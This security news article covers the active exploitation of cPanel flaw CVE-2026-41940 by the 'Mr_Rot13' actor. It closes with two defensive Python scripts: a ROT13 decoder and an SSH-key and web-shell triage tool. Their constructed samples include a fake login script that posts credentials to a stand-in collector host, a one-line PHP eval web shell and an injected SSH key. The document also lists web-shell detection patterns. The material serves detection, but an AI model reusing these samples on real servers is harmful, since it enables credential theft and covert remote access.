Critical cPanel Flaw CVE-2026-41940 Exploited to Deploy Filemanager Backdoor


A newly disclosed critical vulnerability in cPanel is already being actively exploited by cybercriminals to compromise servers, steal credentials, and deploy persistent backdoors. Security researchers have linked the attacks to a threat actor known as “Mr_Rot13,” who is using the flaw to install a malicious backdoor called “Filemanager” on vulnerable systems.

The vulnerability, tracked as CVE-2026-41940, affects both cPanel and WebHost Manager (WHM). The flaw allows attackers to bypass authentication protections and gain elevated access to targeted servers remotely. Because cPanel is widely used by hosting providers and website administrators worldwide, the exploitation of this vulnerability has raised serious concerns across the cybersecurity community.

According to researchers from QiAnXin XLab, attackers began exploiting the vulnerability shortly after public disclosure. The ongoing campaign has already involved more than 2,000 attacker IP addresses globally.

The malicious activity has been observed across multiple regions, with a large number of attacks originating from countries including Germany, the United States, Brazil, and the Netherlands. Researchers warn that automated exploitation attempts are increasing rapidly as cybercriminals race to compromise unpatched servers.

The attackers are not limiting their operations to a single objective. Instead, the compromised servers are being used for several malicious purposes, including:

  • Deploying cryptocurrency miners
  • Installing ransomware
  • Spreading botnets
  • Implanting persistent backdoors
  • Stealing login credentials and sensitive information

This broad range of malicious activity suggests that the vulnerability is being leveraged by multiple threat actors or cybercrime groups for financial gain and long-term persistence.

Researchers discovered that the attack chain begins with a malicious shell script executed on a vulnerable cPanel server. The script uses tools such as wget or curl to download a Go-based malware infector from a remote domain.

Once downloaded, the malware performs several actions designed to maintain long-term access to the compromised system. One of its primary goals is to install an attacker-controlled SSH public key on the server (in practice, an extra entry in an authorized_keys file), which lets the attackers log back in later with key-based authentication, without a password and regardless of any later password reset.

The malware also deploys a PHP-based web shell capable of:

  • Uploading and downloading files
  • Executing remote commands
  • Managing compromised systems remotely

This web shell acts as a control mechanism for attackers, giving them complete control over infected environments.

One of the most dangerous parts of the attack involves credential theft. Researchers found that the attackers inject malicious JavaScript into compromised systems to display customized fake login pages.

These phishing pages are designed to look legitimate and trick administrators into entering their login credentials. Once entered, the stolen details are transmitted to attacker-controlled infrastructure.

Interestingly, the attackers use ROT13 to encode parts of their infrastructure and communication methods. ROT13 is a fixed, keyless letter substitution rather than real encryption: it provides no secrecy, only enough obfuscation to defeat naive string matching on domain names and URLs. This technique likely inspired the threat actor’s name, “Mr_Rot13.”

The stolen credentials can then be used to further compromise hosting accounts, websites, and internal systems connected to the affected servers.
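Because ROT13 is its own inverse and keyless, an analyst can recover the obfuscated collector addresses from an injected login script without any key material. The following is an added example, not code from QiAnXin XLab or from the campaign: it decodes every JavaScript string literal with ROT13 and reports only those whose decoded form looks like a URL or host name. The sample script, its host name and its path are constructed for this illustration and are not real indicators.

```python
import codecs
import re

# Constructed sample of an injected credential-stealing script, modelled on the
# article's description (fake login form, collector address hidden with ROT13).
# The host name and path are invented for this example, not real indicators.
SAMPLE_JS = r'''
<script>
var f = document.createElement("form");
f.innerHTML = '<input name="user"><input name="pass" type="password">';
var u = "uggcf://pbyyrpgbe.rknzcyr.arg/ybtva.cuc";
var k = "Ybtva";
f.onsubmit = function () { fetch(rot(u), { method: "POST", body: new FormData(f) }); };
document.body.appendChild(f);
</script>
'''

# JavaScript string literals in double or single quotes (escapes not needed here).
STRING_RE = re.compile(r'"([^"\\]*)"|\'([^\'\\]*)\'')

# What a decoded string must look like to be reported: a URL or a bare host name.
URL_RE = re.compile(r'^(?:https?://)?[a-z0-9-]+(?:\.[a-z0-9-]+)+(?:/\S*)?$', re.I)


def rot13(s: str) -> str:
    """ROT13 is an involution: the same call encodes and decodes."""
    return codecs.decode(s, "rot_13")


def find_rot13_urls(js: str) -> list[tuple[str, str]]:
    """Return (encoded, decoded) pairs for every string literal whose ROT13
    image looks like a URL or host name. Ordinary strings decode to noise and
    fail the URL check, so what remains is the hidden infrastructure."""
    hits = []
    for m in STRING_RE.finditer(js):
        literal = m.group(1) if m.group(1) is not None else m.group(2)
        decoded = rot13(literal)
        if URL_RE.match(decoded):
            hits.append((literal, decoded))
    return hits


if __name__ == "__main__":
    for enc, dec in find_rot13_urls(SAMPLE_JS):
        print(f"{enc} -> {dec}")
```

Run against a page suspected of carrying an injected login form, the decoded host names are what to block at the egress firewall and search for across other accounts on the same server.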


After stealing credentials and establishing persistence, the attackers deploy a backdoor known as “Filemanager.” Researchers say the malware is cross-platform, meaning it can infect:

  • Linux systems
  • Windows devices
  • macOS environments

The Filemanager backdoor provides advanced capabilities, including remote shell access, command execution, and file management functions. This gives attackers extensive control over infected systems and makes detection more difficult.

The malware is reportedly delivered through another shell script downloaded from a suspicious domain associated with the campaign.

The malware is also capable of harvesting large amounts of sensitive information from infected servers. Researchers found evidence that the attackers collect:

  • Bash history files
  • SSH credentials and configurations
  • Device and system information
  • Database passwords
  • cPanel virtual aliases (valiases)

The stolen data is reportedly exfiltrated to a Telegram group operated by a user identified as “0xWR.” This method allows attackers to centralize and monitor stolen information from multiple victims efficiently.

The use of Telegram for command-and-control communication and data exfiltration has become increasingly common among cybercriminals: it is free, easy to automate, and its traffic to Telegram’s servers is ordinary HTTPS that blends in with legitimate use. For the same reason, outbound connections to Telegram from a hosting server deserve a closer look.

Security researchers believe the group behind the attacks may have been active for several years without attracting significant attention.

Their assessment is based on evidence showing that the command-and-control infrastructure used in the latest attacks was previously linked to a PHP backdoor called “helper.php,” which was uploaded to VirusTotal back in April 2022. Additionally, one of the malicious domains connected to the campaign was first registered in October 2020.

Despite years of activity, the detection rate for malware samples and infrastructure associated with Mr_Rot13 has remained extremely low across many security products. This suggests the attackers have been successful at avoiding detection while quietly expanding their operations.

The active exploitation of CVE-2026-41940 highlights the growing risks facing organizations that rely on cPanel and WHM for server management. Because attackers are already automating exploitation attempts, unpatched systems are highly vulnerable to compromise.

Organizations and hosting providers should immediately:

  • Apply the latest security patches from cPanel
  • Monitor servers for unusual SSH keys and web shells: review every authorized_keys file (root and each hosting account) for entries nobody can account for, and look for recently added PHP files in web roots and hidden directories
  • Review login activity for suspicious behavior
  • Scan systems for unauthorized scripts and malware
  • Restrict remote access where possible, for example by limiting the cPanel/WHM ports (2082/2083 and 2086/2087) and SSH to trusted networks
  • Enable multi-factor authentication (MFA)

Cybersecurity experts also recommend reviewing server logs carefully to identify signs of exploitation or unauthorized access attempts. On a cPanel host the relevant logs include /usr/local/cpanel/logs/access_log and /usr/local/cpanel/logs/login_log, alongside the system authentication log for SSH.
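The two persistence mechanisms described above (an injected SSH public key and a PHP web shell) are also the two quickest things to check on a suspected host. The script below is an added example written for this article, not tooling from XLab, cPanel or the threat actor: it parses an authorized_keys file, tolerating option prefixes such as `command="..."`, flags any key not on a known-good list, and scans a web root for PHP files matching common web-shell constructs. The fixture it builds in a temporary directory (the allowed key, the injected key, the hidden `fm.php`) is constructed for the demonstration; none of it is real key material or a real indicator.

```python
import re
import tempfile
from pathlib import Path

# Known-good keys would normally come from configuration management.
# This one is a constructed, hypothetical placeholder, not a real key.
ALLOWED_KEYS = [
    "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleAdminKey0000000000000000000000 admin@ops",
]

KEY_TYPES = ("ssh-rsa", "ssh-ed25519", "ecdsa-sha2-", "sk-ssh-", "sk-ecdsa-")

# Constructs that are rarely legitimate in a hosting account's web root.
WEBSHELL_PATTERNS = [
    re.compile(r'eval\s*\(\s*(?:base64_decode|gzinflate|str_rot13)\s*\('),
    re.compile(r'(?:system|shell_exec|passthru|exec|proc_open)\s*\(\s*\$_(?:GET|POST|REQUEST)'),
    re.compile(r'\$_(?:GET|POST|REQUEST|COOKIE)\s*\[[^\]]+\]\s*\(\s*\$_(?:GET|POST|REQUEST)'),
]


def parse_key_line(line: str):
    """Return (key_type, base64_blob) from an authorized_keys line, skipping
    any leading options (command="...", no-pty, ...); None for blanks/comments."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    tokens = line.split()
    for i, tok in enumerate(tokens):
        if tok.startswith(KEY_TYPES) and i + 1 < len(tokens):
            return tok, tokens[i + 1]
    return None


def unexpected_keys(authorized_keys: Path, allowed_lines) -> list[str]:
    """Lines of authorized_keys whose (type, blob) is not on the allow list.
    Comparing on the blob ignores attacker-chosen comments and options."""
    allowed = {parse_key_line(l) for l in allowed_lines} - {None}
    found = []
    for line in Path(authorized_keys).read_text().splitlines():
        parsed = parse_key_line(line)
        if parsed and parsed not in allowed:
            found.append(line.strip())
    return found


def scan_php(root: Path) -> list[tuple[str, str]]:
    """(relative path, matched pattern) for every PHP file under root,
    hidden directories included, that matches a web-shell pattern."""
    hits = []
    for path in Path(root).rglob("*.php"):
        try:
            text = path.read_text(errors="replace")
        except OSError:
            continue
        for pat in WEBSHELL_PATTERNS:
            if pat.search(text):
                hits.append((str(path.relative_to(root)), pat.pattern))
                break
    return sorted(hits)


def triage(home: Path) -> dict:
    """Run both checks against one account home (or /root)."""
    home = Path(home)
    return {
        "unexpected_keys": unexpected_keys(home / ".ssh" / "authorized_keys", ALLOWED_KEYS),
        "webshells": scan_php(home / "public_html"),
    }


def build_sample_host(root) -> Path:
    """Constructed fixture: one legitimate key plus an injected one, a benign
    page and a hidden web shell. Nothing here is real key or indicator data."""
    root = Path(root)
    (root / ".ssh").mkdir(parents=True)
    (root / ".ssh" / "authorized_keys").write_text(
        "# ops-managed\n" + ALLOWED_KEYS[0] + "\n"
        + 'no-pty,command="/bin/sh" ssh-ed25519 '
          'AAAAC3NzaC1lZDI1NTE5AAAAIInjectedKeyConstructedForExample0000000 root@attacker\n'
    )
    (root / "public_html" / ".cache").mkdir(parents=True)
    (root / "public_html" / "index.php").write_text("<?php echo 'hello'; ?>\n")
    (root / "public_html" / ".cache" / "fm.php").write_text(
        '<?php @eval(base64_decode($_POST["c"])); ?>\n'
    )
    return root


def demo() -> dict:
    """Build the fixture in a temp dir, triage it and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        return triage(build_sample_host(tmp))


if __name__ == "__main__":
    for name, findings in demo().items():
        print(name, findings)
```

On a real cPanel host, call `triage()` for `/root` and for every `/home/<account>` directory, and treat each unexpected key as a separate persistence channel to remove (an attacker's key keeps working after the vulnerability is patched and passwords are rotated).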
